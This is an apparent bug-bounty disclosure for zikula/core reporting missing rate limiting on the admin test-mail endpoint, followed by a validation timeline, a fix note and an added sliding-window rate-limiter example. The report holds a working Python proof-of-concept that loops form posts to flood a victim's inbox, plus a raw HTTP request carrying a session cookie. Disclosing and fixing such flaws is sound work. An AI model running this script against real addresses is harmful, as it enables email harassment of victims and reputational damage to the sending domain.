Insufficient Granularity of Access Control in zikula/core


Reported on

Jan 3rd 2022


When sending test emails, you're able to spam a victim's email address with as many emails as an attacker wants, due to a lack of rate limiting (/mailer/config/test). I've put together a simple Python script that exploits this and would allow you to send a custom number of emails to any victim's email address.

Proof of Concept

# Example usage: python3 -csrf "JHja3y8NfO1LWy0UiJ4sC6NxzQoc064tCLQVko6PSj4" -cookie "sqrv94auln8thq23032rflgjc8" -subject "test" -message "test" -email ""

import requests, argparse

def spammer(csrfToken, cookie, email, subject, message):
    # Form fields of the test-mail form posted to /mailer/config/test
    data = {
        "zikulamailermodule_test[toName]": "Test",
        "zikulamailermodule_test[toAddress]": email,
        "zikulamailermodule_test[subject]": subject,
        "zikulamailermodule_test[messageType]": "text",
        "zikulamailermodule_test[bodyHtml]": "",
        "zikulamailermodule_test[bodyText]": message,
        "zikulamailermodule_test[test]": "",
        "zikulamailermodule_test[_token]": csrfToken
    }
    # Host, Origin and Referer were blanked out in the report. Content-Length is
    # computed by requests from the encoded body, so it is not set by hand here.
    headers = {
        "Host": "",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "",
        "DNT": "1",
        "Connection": "keep-alive",
        "Referer": "",
        "Cookie": "_zsid=" + cookie,
        "Upgrade-Insecure-Requests": "1",
        "Sec-GPC": "1",
        "TE": "Trailers",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache"}
    # The target URL was also blanked out in the report
    r = requests.post("", headers=headers, data=data)
    return r

parser = argparse.ArgumentParser()
parser.add_argument("-csrf", "--csrf-token", required=True, help="Your CSRF token.")
parser.add_argument("-cookie", "--cookie", required=True, help="Your session cookie")
parser.add_argument("-email", "--email", required=True, help="The victim email address")
parser.add_argument("-subject", "--subject", required=True, help="The subject line of the email")
parser.add_argument("-message", "--message", required=True, help="The message body of the email")
arguments = parser.parse_args()

# Increase the number inside the parentheses to increase the number of emails sent
for i in range(10):
    spammer(arguments.csrf_token, arguments.cookie, arguments.email, arguments.subject, arguments.message)


POST /mailer/config/test HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
DNT: 1
Connection: keep-alive
Cookie: _zsid=4pl4j2sj5m5ee4csbcsq9saqjh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0


The impact of this will be negative for the targeted email address and also for the domain (and for other domains, when the web application is hosted on one domain and emails are sent from a different one), since it's possible that the victim would report the domain as a spam domain, resulting in reputational damage to the domain.
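The mitigation the report asks for is a rate limit on the test-mail endpoint, keyed on the acting admin session rather than on the recipient. The following is an added example, not Zikula's code (the real fix lives in the PHP code base referenced by commit 06dee1): a sliding-window limiter placed in front of a stand-in handler, with a controllable clock so the burst-then-recover behaviour can be shown without sleeping. The class names, the limit of three mails per minute and the FakeClock are assumptions for illustration.

```python
"""Added example, not Zikula's code: a per-user rate limit in front of a
"send test email" handler. Names, limits and FakeClock are assumptions."""
import logging
import time
from collections import defaultdict, deque

log = logging.getLogger("mailer.test")


class SlidingWindowLimiter:
    """Allow at most `limit` accepted calls per `window_seconds` for each key."""

    def __init__(self, limit, window_seconds, clock=time.monotonic):
        self.limit = limit
        self.window = window_seconds
        self.clock = clock
        self._hits = defaultdict(deque)  # key -> timestamps of accepted calls

    def _prune(self, key, now):
        hits = self._hits[key]
        while hits and now - hits[0] >= self.window:  # drop expired timestamps
            hits.popleft()
        return hits

    def allow(self, key):
        now = self.clock()
        hits = self._prune(key, now)
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True

    def retry_after(self, key):
        """Seconds until the oldest hit leaves the window (0 if not limited)."""
        now = self.clock()
        hits = self._prune(key, now)
        if len(hits) < self.limit:
            return 0.0
        return self.window - (now - hits[0])


class TestMailEndpoint:
    """Stand-in for the /mailer/config/test handler; `sent` records deliveries."""

    def __init__(self, limiter):
        self.limiter = limiter
        self.sent = []

    def handle(self, user_id, to_address, subject, body):
        # Key on the acting admin account: the request is authenticated and
        # CSRF-protected, so the session is the natural unit to limit.
        key = f"user:{user_id}"
        if not self.limiter.allow(key):
            wait = self.limiter.retry_after(key)
            # Log the rejection; repeated 429s for one account are a detection signal.
            log.warning("test-mail rate limit hit user=%s to=%s retry_after=%.0fs",
                        user_id, to_address, wait)
            return {"status": 429, "retry_after": round(wait)}
        self.sent.append((user_id, to_address, subject))
        return {"status": 200}


class FakeClock:
    """Controllable clock so the behaviour can be shown without sleeping."""

    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def demo():
    """Burst of five requests from one admin session, then one after the window."""
    clock = FakeClock()
    endpoint = TestMailEndpoint(SlidingWindowLimiter(limit=3, window_seconds=60, clock=clock))
    statuses = []
    for _ in range(5):
        statuses.append(endpoint.handle("admin", "victim@example.com", "test", "test")["status"])
        clock.advance(1)
    clock.advance(60)  # the window has passed; the account may send again
    statuses.append(endpoint.handle("admin", "victim@example.com", "test", "test")["status"])
    return statuses, len(endpoint.sent)


if __name__ == "__main__":
    print(demo())  # ([200, 200, 200, 429, 429, 200], 4)
```

The limiter state here is in-process memory; behind several web workers the counters would have to live in a shared store (cache or database), which is what a framework-provided rate limiter does for you. Keying on the admin account also means the log line identifies which session produced the burst, which is the signal a defender would alert on.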

We are processing your report and will contact the zikula/core team within 24 hours. 2 years ago
We have contacted a member of the zikula/core team and are waiting to hear back 2 years ago
Axel Guckelsberger validated this vulnerability 2 years ago
1d8 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Axel Guckelsberger marked this as fixed in 4.0.0 with commit 06dee1 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE 2 years ago

Thanks for this report. Added rate limiting like you suggested. Note the fix is not applied to the demo page yet, as this is running an older version at the moment.
